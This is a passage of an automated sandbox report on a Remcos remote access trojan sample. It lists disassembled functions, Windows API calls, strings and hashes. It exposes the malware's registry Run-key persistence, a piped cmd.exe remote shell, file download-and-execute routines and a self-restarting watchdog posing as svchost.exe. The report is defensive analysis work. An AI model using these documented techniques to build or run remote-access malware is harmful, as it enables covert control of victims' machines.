                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                                                                                                            Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LongNamePath
                                                                                                                                                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                                                            • API String ID: 82841172-425784914
                                                                                                                                                                                                                                            • Opcode ID: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
                                                                                                                                                                                                                                            • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                                                                                                                                                                                                                                            Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                                                                                                                                            • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                            • API String ID: 1866151309-3211212173
                                                                                                                                                                                                                                            • Opcode ID: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
                                                                                                                                                                                                                                            • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                                                                                                                                                                                                                            Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 652 446f53-446f6a GetLastError 653 446f6c-446f76 call 447476 652->653 654 446f78-446f7f call 448716 652->654 653->654 659 446fc9-446fd0 SetLastError 653->659 658 446f84-446f8a 654->658 660 446f95-446fa3 call 4474cc 658->660 661 446f8c 658->661 663 446fd2-446fd7 659->663 667 446fa5-446fa6 660->667 668 446fa8-446fbe call 446d41 call 446ad5 660->668 664 446f8d-446f93 call 446ad5 661->664 670 446fc0-446fc7 SetLastError 664->670 667->664 668->659 668->670 670->663
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,0043A7D2,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F58
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446F8D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446FB4
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                            • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                                                                                                                                            Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 412774-412787 RegCreateKeyW 676 4127c6 675->676 677 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 675->677 678 4127c8-4127d4 call 401e13 676->678 677->678
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                                                                                                                                                                                                            • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,74DF37E0,?), ref: 004127AD
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,74DF37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                            • API String ID: 1818849710-1051519024
                                                                                                                                                                                                                                            • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                                                                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                                                                            Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 685 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                            • String ID: (CG
                                                                                                                                                                                                                                            • API String ID: 1925916568-4210230975
                                                                                                                                                                                                                                            • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                                                                            Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 688 412513-41253f RegOpenKeyExA 689 412541-412567 RegQueryValueExA RegCloseKey 688->689 690 412572 688->690 689->690 692 412569-412570 689->692 691 412577-412583 call 401f66 690->691 692->691
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                                                                                            • Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                                                                                                                                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                                                                                                            Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 695 4124b7-4124df RegOpenKeyExA 696 4124e1-412509 RegQueryValueExA RegCloseKey 695->696 697 41250f-412512 695->697 696->697 698 41250b-41250e 696->698
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                                                                                                            Function 00448716 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 727 448716-448721 728 448723-44872d 727->728 729 44872f-448735 727->729 728->729 730 448763-44876e call 445364 728->730 731 448737-448738 729->731 732 44874e-44875f RtlAllocateHeap 729->732 737 448770-448772 730->737 731->732 733 448761 732->733 734 44873a-448741 call 4447d5 732->734 733->737 734->730 740 448743-44874c call 442210 734->740 740->730 740->732
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                                                                                                                                                            • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                                                                                              • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                                                                                                            • API String ID: 2918587301-599666313
                                                                                                                                                                                                                                            • Opcode ID: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
                                                                                                                                                                                                                                            • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                                                                                                                                                            Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                                                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                                                            • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                                                                                                                                            • API String ID: 3815868655-1274243119
                                                                                                                                                                                                                                            • Opcode ID: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                                                                            • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                                                                                                                                            Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                                                                            • API String ID: 65172268-860466531
                                                                                                                                                                                                                                            • Opcode ID: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                                                                            • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
